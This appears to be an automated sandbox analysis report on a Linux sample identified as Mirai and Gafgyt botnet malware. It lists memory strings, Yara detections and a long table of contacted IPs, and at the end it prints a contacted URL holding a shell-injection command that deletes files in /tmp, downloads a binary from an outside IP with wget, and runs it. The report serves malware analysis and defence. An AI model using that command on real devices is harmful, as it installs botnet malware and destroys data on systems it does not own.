Source: 5237.18.dr Binary or memory string: 7xml::parser::style::streamXML::Parser::Style::Stream3pm315701248990A--gzStream style for XML::Parsersystemd-timedated-8816268940210B--gzTime and date bus mechanismxfce4-keyboard-settings-1115867081120A--gzKeyboard settings for Xfcepygettext2-1115841026830B--gzPython equivalent of xgettext(1)sudoedit-8816110660620B--gzexecute a command as another userintro7-7715812813670A--gzintroduction to overview and miscellany sectionsprof-1115812813670A--gzread and display shared object profiling datadhclient.conf-5516219398220A--gzDHCP client configuration filepam_group-8815953742440A--gzPAM module for group accesssystemd-ask-password-1116268940210A--gzQuery the user for a system passwordupdate-dictcommon-hunspell-8815422954860A--gzrebuild hunspell database and emacsen stuffqemu-nios2-1116261022170B--gzQEMU User Emulatorlwp::useragentLWP::UserAgent3pm315750405830A--gzWeb user agent classgpgcompose-1115838662460A--gzGenerate a stream of OpenPGP packetsecho-1115676799200A--gzdisplay a line of textio::socket::ssl::utilsIO::Socket::SSL::Utils3pm315817106800A--gz- loading, storing, creating certificates and keyscurl-1116268709580A--gztransfer a URLgetcap-8815819434600A--gzexamine file capabilitieszegrep-1115762517060B--gzsearch possibly compressed files for a regular expressiongrub-syslinux2cfg-1116214898500A--gztransform syslinux config into grub.cfgrtc-4415812813670A--gzreal-time clockglib::codegenGlib::CodeGen3pm315820097650A--gzcode generation utilities for Glib-based bindings.wpa_cli-8816146062790A--gzWPA command line clientiso_8859_3-7715812813670B--gzISO 8859-3 character set encoded in octal, decimal, and hexadecimaliso_8859-9-7715812813670A-tgzISO 8859-9 character set encoded in octal, decimal, and hexadecimallvextend-8815816289110A--gzAdd space to a logical volumeresolvectl-1116268940210A--gzResolve domain names, IPV4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS resolverchgrp-1115676799200A--gzchange group ownershipsystemd-cgls-1116268940210A--gzRecursively show control group contentspygettext3.8-1113852085880A--gzPython equivalent of xgettext(1)ping4-8815804258830B--gzsend ICMP ECHO_REQUEST to network hostsidmapwb-8816000845410A--gzwinbind ID mapping plugin for cifs-utilsapturl-gtk-8815799493830B--gzgraphical apt-protocol interpreting package installersane-epsonds-5516003468200A--gzSANE backend for EPSON ESC/I-2 scannersgvfs-monitor-file-1115868766090A--gzrstart-1115829564830A--gza sample implementation of a Remote Start clientgit-stage-1116148628880A--gzAdd file contents to the staging areatc-pedit-8815816145190A--gzgeneric packet editor actioniptables-save-881582899
Source: 5237.18.dr Binary or memory string: I_qemu
Source: 5237.18.dr Binary or memory string: -1116261022170B--gzQEMU User Emulator
Source: 5237.18.dr Binary or memory string: -3315837702310A--gzvmware shared library
Source: 5237.18.dr Binary or memory string: qemu-mips
Source: 5237.18.dr Binary or memory string: qemuj\
Source: nSg5RM0w0d, 5278.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5281.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5282.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5286.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5289.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5290.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5294.1.000000001e4697c8.0000000045731922.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/nSg5RM0w0dSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nSg5RM0w0d
Source: 5237.18.dr Binary or memory string: {qemuQ&
Source: 5237.18.dr Binary or memory string: Wgnome-text-editor-111629209547491759146B--gztext editor for the GNOME Desktopx11::protocol::connection::filehandleX11::Protocol::Connection::FileHandle3pm314314075500A--gzPerl module base class for FileHandle-based X11 connectionshtbHTB8815816145190Ctc-htb-gzcifscreds-1116000845410A--gzmanage NTLM credentials in kernel keyringiwconfig-8815490049440A--gzconfigure a wireless network interfaceossl_store-file-7ssl716164130370A--gzThe store 'file' scheme loadertc-stab-8815816145190A--gzGeneric size table manipulationsnotifier-7715877390340A--gzcups notification interfaceqemu-arm-1116261022170B--gzQEMU User EmulatorgemfileGemfile5516263767190Cgemfile2.7-gzglib::object::subclassGlib::Object::Subclass3pm315820097650A--gzregister a perl class as a GObject classnetcat-111612200165426646725B--gzarbitrary TCP and UDP connections and listensdpkg::changelog::parseDpkg::Changelog::Parse3perl315849439740A--gzgeneric changelog parser for dpkg-parsechangelogmpris-proxy-1116243432320A--gzBluetooth mpris-proxybundle-pristine2.7-1116263767190A--gzRestores installed gems to their pristine conditionfsck.ext3-8815816604980B--gzcheck a Linux ext2/ext3/ext4 file systemvolname-1115625752510A--gzreturn volume nameiso-8859-9-7715812813670B--gzISO 8859-9 character set encoded in octal, decimal, and hexadecimalheadhead1HEAD1psd-4415812813670A--gzdriver for SCSI disk driveschrt-1115953177680A--gzmanipulate the real-time attributes of a processvcs-4415812813670A--gzvirtual console memorygit-upload-archive-1116148628880A--gzSend archive back to git-archivenet::dbus::binding::message::errorNet::DBus::Binding::Message::Error3pm315773746310A--gza message encoding a method call errorpkcs11.conf-5516097870510A--gzConfiguration files for PKCS#11 modulessfill-1115227593860A--gzsecure free disk and inode space wiper (secure_deletion toolkit)ldattach-8815953177680A--gzattach a line discipline to a serial linethin_restore-8815811608350A--gzrestore thin provisioning metadata file to device or file.phar.phar7.4-1116254980150B--gzPHAR (PHP archive) command line toolbundle-outdated2.7-1116263767190A--gzList installed gems with newer versions availablemail::addressMail::Address3pm315640244160A--gzparse mail addressesopenssl-ca-1ssl116164130370B--gzsample minimal CA applicationchardet3-1115765858900A--gzuniversal character encoding detectorerb2.7-1116263767190A--gzRuby Templatingchktrust-1115826667350A--gzCheck the trust of a PE executable.sg_raw-8815825816070A--gzsend arbitrary SCSI command to a devicegvfs-trash-1115868766090A--gzintro1-1115812813670A--gzintroduction to user commandsmailcap-5515714399500A--gzmetamail capabilities filegigoloGigolo1gig
Source: 5237.18.dr Binary or memory string: vmware-xferlogs

Language, Device and Operating System Detection:

barindex
Reads system files that contain records of logged in users
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) Logged in records file read: /var/log/wtmp Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) Logged in records file read: /var/log/wtmp Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Yara detected Gafgyt
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Yara detected Gafgyt
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
82.125.79.157
 unknown France
3215 FranceTelecom-OrangeFR false
82.237.229.86
 unknown France
12322 PROXADFR false
76.72.131.87
 unknown United States
21981 GOEASTONUS false
155.95.85.169
 unknown United States
18456 GDIT-AS1US false
106.216.185.226
 unknown India
45609 BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService false
73.105.34.11
 unknown United States
7922 COMCAST-7922US false
168.225.157.89
 unknown United States
27435 OPSOURCE-INCUS false
50.114.10.124
 unknown United States
61317 ASDETUKhttpwwwheficedcomGB false
52.49.15.231
 unknown United States
16509 AMAZON-02US false
104.214.224.221
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
88.245.81.179
 unknown Turkey
9121 TTNETTR false
131.251.226.21
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
169.37.91.35
 unknown Switzerland
37611 AfrihostZA false
125.53.105.82
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
88.16.182.166
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
190.10.105.51
 unknown Costa Rica
11830 InstitutoCostarricensedeElectricidadyTelecomCR false
167.179.151.167
 unknown Australia
4764 WIDEBAND-AS-APAussieBroadbandAU false
5.166.10.58
 unknown Russian Federation
51819 YAR-ASRU false
43.205.251.248
 unknown Japan 4249 LILLY-ASUS false
70.230.219.247
 unknown United States
7018 ATT-INTERNET4US false
98.228.221.112
 unknown United States
7922 COMCAST-7922US false
63.58.17.229
 unknown United States
701 UUNETUS false
40.15.158.90
 unknown United States
4249 LILLY-ASUS false
38.21.173.197
 unknown United States
11738 BLIP-NETWORKSUS false
87.236.77.16
 unknown France
3215 FranceTelecom-OrangeFR false
146.122.54.110
 unknown United States
22216 SIEMENS-PLMUS false
189.39.227.49
 unknown Brazil
28321 FederacaodasCamarasdeDirigentesLojistasSCBR false
85.122.137.62
 unknown Romania
41496 RO-TVSAT-ASRO false
95.36.119.231
 unknown Netherlands
15670 BBNED-AS1NL false
143.142.32.104
 unknown United States
385 AFCONC-BLOCK1-ASUS false
113.112.4.109
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
69.212.49.41
 unknown United States
7018 ATT-INTERNET4US false
17.157.3.229
 unknown United States
714 APPLE-ENGINEERINGUS false
139.193.211.227
 unknown Indonesia
23700 FASTNET-AS-IDLinknet-FastnetASNID false
110.244.101.120
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
120.80.62.97
 unknown China
17623 CNCGROUP-SZChinaUnicomShenzennetworkCN false
163.8.122.9
 unknown Australia
45589 ENERGYAUST-ASAUSGRIDAU false
99.136.89.88
 unknown United States
7018 ATT-INTERNET4US false
206.63.232.245
 unknown United States
20271 WINDWIRELESSUS false
142.224.201.64
 unknown Canada
13576 SDNW-13576US false
114.118.210.232
 unknown China
136958 UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCN false
134.209.44.112
 unknown United States
14061 DIGITALOCEAN-ASNUS false
182.189.25.137
 unknown Pakistan
132165 CONNECT-AS-APConnectCommunicationsPK false
52.84.92.177
 unknown United States
16509 AMAZON-02US false
156.215.141.86
 unknown Egypt
8452 TE-ASTE-ASEG false
186.195.5.248
 unknown Brazil
262734 Rede-TuxNetBR false
213.110.25.60
 unknown Russian Federation
49483 SKATISPRU false
139.113.193.20
 unknown Norway
5619 EVRY-NO false
94.54.78.131
 unknown Turkey
47524 TURKSAT-ASTR false
86.75.124.223
 unknown France
15557 LDCOMNETFR false
192.141.163.66
 unknown Brazil
267489 NEOVEXCOMERCIOESERVICOSDETELECOMUNICACOESBR false
54.233.11.252
 unknown United States
16509 AMAZON-02US false
68.58.216.220
 unknown United States
7922 COMCAST-7922US false
121.227.88.55
 unknown China
23650 CHINANET-JS-AS-APASNumberforCHINANETjiangsuprovinceba false
80.60.82.221
 unknown Netherlands
1136 KPNKPNNationalEU false
133.232.125.48
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
52.94.98.4
 unknown United States
16509 AMAZON-02US false
147.110.180.178
 unknown South Africa
54363 BHIUS false
169.199.161.126
 unknown United States
23309 CCCOE-NETUS false
200.95.19.78
 unknown Mexico
8151 UninetSAdeCVMX false
34.61.9.98
 unknown United States
2686 ATGS-MMD-ASUS false
46.190.17.103
 unknown Greece
25472 WIND-ASGR false
67.254.189.11
 unknown United States
12271 TWC-12271-NYCUS false
190.76.228.209
 unknown Venezuela
27889 TelecomunicacionesMOVILNETVE false
67.220.186.99
 unknown United States
55081 24SHELLSUS false
103.123.2.193
 unknown Taiwan; Republic of China (ROC)
131632 LETSWIN-ASN-1LETSWINTELECOMCOLTDTW false
192.243.129.200
 unknown United States
22284 AS22284-DOI-OPSUS false
101.32.48.92
 unknown China
132203 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN false
194.28.179.220
 unknown Ukraine
197073 KUZNETSOVSK-ASUA false
216.54.175.15
 unknown United States
14454 PERIMETER-ESECURITYUS false
118.212.117.45
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
47.171.224.192
 unknown United States
5650 FRONTIER-FRTRUS false
223.124.158.166
 unknown China
58453 CMI-INT-HKLevel30Tower1HK false
148.221.102.35
 unknown Mexico
8151 UninetSAdeCVMX false
83.20.191.39
 unknown Poland
5617 TPNETPL false
199.107.217.174
 unknown United States
54690 CLUUS false
1.128.184.34
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
146.104.244.64
 unknown Netherlands
31822 CITY-UNIVERSITY-OF-NEW-YORKUS false
86.182.64.238
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
112.94.220.109
 unknown China
17622 CNCGROUP-GZChinaUnicomGuangzhounetworkCN false
138.241.60.27
 unknown United States
12980 EMEAHostingAutonomousSystemEU false
9.196.70.214
 unknown United States
3356 LEVEL3US false
90.119.126.11
 unknown France
3215 FranceTelecom-OrangeFR false
185.118.141.131
 unknown Turkey
57844 SPD-NETTR false
41.110.164.253
 unknown Algeria
36947 ALGTEL-ASDZ false
95.221.124.215
 unknown Russian Federation
12714 TI-ASMoscowRussiaRU false
71.104.168.123
 unknown United States
701 UUNETUS false
130.51.4.50
 unknown Reserved
15601 BaringInvestmentServicesGB false
62.20.16.13
 unknown Sweden
3301 TELIANET-SWEDENTeliaCompanySE false
139.140.222.34
 unknown United States
22847 BOWDOINUS false
166.76.52.137
 unknown United States
1350 SEARSNET-ASUS false
163.5.177.186
 unknown France
56339 EPITECHFR false
63.240.110.192
 unknown United States
17232 ATT-CERFNET-BLOCKUS false
185.240.220.152
 unknown Czech Republic
204772 RSD-CZ false
182.184.108.188
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK false
67.46.64.246
 unknown United States
6621 HNS-DIRECPCUS false
69.65.111.10
 unknown United States
14383 VCS-ASUS false
123.79.119.67
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
47.87.41.215
 unknown United States
3209 VODANETInternationalIP-BackboneofVodafoneDE false
132.39.33.228
 unknown United States
385 AFCONC-BLOCK1-ASUS false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.33.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws false
  • Avira URL Cloud: safe
 unknown